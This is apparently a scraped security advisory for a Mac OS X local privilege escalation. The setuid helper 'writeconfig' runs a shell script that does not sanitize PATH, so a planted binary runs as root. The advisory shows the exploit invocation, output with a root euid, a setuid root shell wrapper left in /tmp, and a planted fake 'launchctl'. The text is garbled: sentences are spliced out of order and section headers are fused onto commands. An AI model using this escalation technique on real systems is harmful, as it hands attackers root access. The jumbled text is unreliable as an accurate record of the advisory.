Application:: Mac OS X
Description:: The preference panes setuid helper,
writeconfig, makes use of a shell script which lacks of
PATHsanitization, allowing users to execute arbitrary binaries under root privileges.
Apple provides the following description in the The Preference Application documentation::
System Preferences is the standard location for presenting system-level preferences on OSX. The preference panes shipped with Mac OS X include panes affecting hardware (such as the Sound, Mouse, and Display panes), software integrated into the system (such as the Dock and Screen Saver panes), and behavior applicable to every application (such as the International and General panes). When application preferences apply to the system or to the user's environment as a whole, a developer can make the preference pane available to System Preferences.Exploit:: The provided (simplistic) exploit will create a root setuid shell wrapper at
Several of the default preference panes rely on a setuid helper,
/tmp/shX. It relies on minimal interaction by the user, read the 'Exploitation conditions' section as this is just one of the possible methods to abuse the issue.
$ ruby MOAB-21-01-2007.rbMore...
++ Click on Sharing and then click on Windows Sharing...
uid=501(lmh) gid=501(lmh) euid=0(root) groups=501(lmh), 81(appserveradm),
sh-2.05b# ls -al /private/tmp/
-rwxr-xr-x 1 lmh wheel 13344 Jan 21 19:29 launchctl
-rwsr-xr-x 1 root wheel 13344 Jan 21 19:29 shX
-rw-r--r-- 1 lmh wheel 78 Jan 21 19:29 t.c
$ head /sbin/serviceLinks::
# don't let people kill us. We shouldn't be long, so this isn't a big deal.
trap "" TSTP
trap "" HUP
trap "" INT